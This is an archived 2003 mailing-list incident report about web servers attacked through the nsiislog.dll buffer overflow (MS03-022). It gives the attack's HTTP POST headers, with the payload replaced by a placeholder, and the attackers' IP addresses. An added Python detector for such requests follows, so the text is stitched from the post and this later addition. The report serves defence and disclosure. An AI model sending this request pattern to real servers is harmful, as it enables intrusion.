Successful attack using MS03-022 vuln

Mike Iglesias iglesias at draco.acs.uci.edu
Wed Sep 24 16:42:49 GMT 2003


We've been seeing probing against web servers looking for
/scripts/nsiislog.dll, which is used by Windows Media Services to
deliver multicast streaming media (nsiislog.dll is the subject of MS03-022,
which fixes a buffer overflow in it).  The probes are usually a "GET
/scripts/nsiislog.dll".

We have also seen some "POST /scripts/nsiislog.dll" that look like
this:

POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
Accept: */*{D}{A}
User-Agent: NSPlayer/4.1.0.3917{D}{A}
Content-Type: text/plain{D}{A}
Content-Length: 9996{D}{A}
Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
Connection: Close{D}{A}
{D}{A}
MX_STATS_LogLine: *** huge line to cause a buffer overflow ***

The huge MX_STATS_LogLine up until today did not carry much other than
repeated hex 'cc' bytes.

Today we had a system successfully hacked via the buffer overflow.  About
20 seconds after the "POST" attack, they had a telnet session open using
port 34816 on the target system.  I cannot tell what they did to the
system once they had access.

The attacks came from 213.129.194.25 and 80.56.228.218 (both in the
Netherlands).  I've appended a packet dump from our Dragon IDS below
in case anyone finds it useful.


Mike Iglesias                          Email:       iglesias at draco.acs.uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069

POST /scripts/nsiislog.dll HTTP/1.0{D}{A}
Accept: */*{D}{A}
User-Agent: NSPlayer/4.1.0.3917{D}{A}
Content-Type: text/plain{D}{A}
Content-Length: 9996{D}{A}
Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}{D}{A}
Connection: Close{D}{A}
{D}{A}
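As an added example that is not part of the original post: a small Python classifier that parses a raw request like the one above and flags the pattern Mike describes (a GET probe for nsiislog.dll, or a POST whose Content-Length or MX_STATS_LogLine body is far larger than any plausible client log line and consists mostly of non-printable bytes). The sample request, the 1024-byte sanity threshold and the reason strings are assumptions of the example, not values from the post.

```python
import re

# Constructed sample (not the post's dump): the IDS's {D}{A} is rendered as real CRLF.
SAMPLE = (
    b"POST /scripts/nsiislog.dll HTTP/1.0\r\n"
    b"Accept: */*\r\n"
    b"User-Agent: NSPlayer/4.1.0.3917\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 9996\r\n"
    b"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
    b"Connection: Close\r\n"
    b"\r\n"
    b"MX_STATS_LogLine: " + b"\xcc" * 9978
)
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"

def parse_request(raw):
    """Split a raw HTTP/1.0 request into (method, path, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path = lines[0].split(b" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method.decode(), path.decode(), headers, body

def classify_nsiislog(raw, max_logline=1024):
    """Reasons the request matches the traffic described in the post; [] = nothing seen.
    max_logline is an assumed sanity limit for a legitimate client log line."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if "/scripts/nsiislog.dll" not in path.lower():
        return reasons
    if method == "GET":
        return ["probe: GET for nsiislog.dll"]
    clen = int(headers.get(b"content-length", b"0") or 0)
    if clen > max_logline:
        reasons.append(f"Content-Length {clen} exceeds {max_logline}")
    m = re.match(rb"MX_STATS_LogLine:\s*(.*)", body, re.S)
    if m:
        line = m.group(1)
        if len(line) > max_logline:
            reasons.append(f"MX_STATS_LogLine body of {len(line)} bytes")
        printable = sum(32 <= b < 127 for b in line)
        if line and printable / len(line) < 0.5:
            reasons.append("log line is mostly non-printable bytes (0xCC filler or code)")
    return reasons
```

Run against SAMPLE it reports all three reasons, while the BENIGN request and any POST with a short, printable log line produce none.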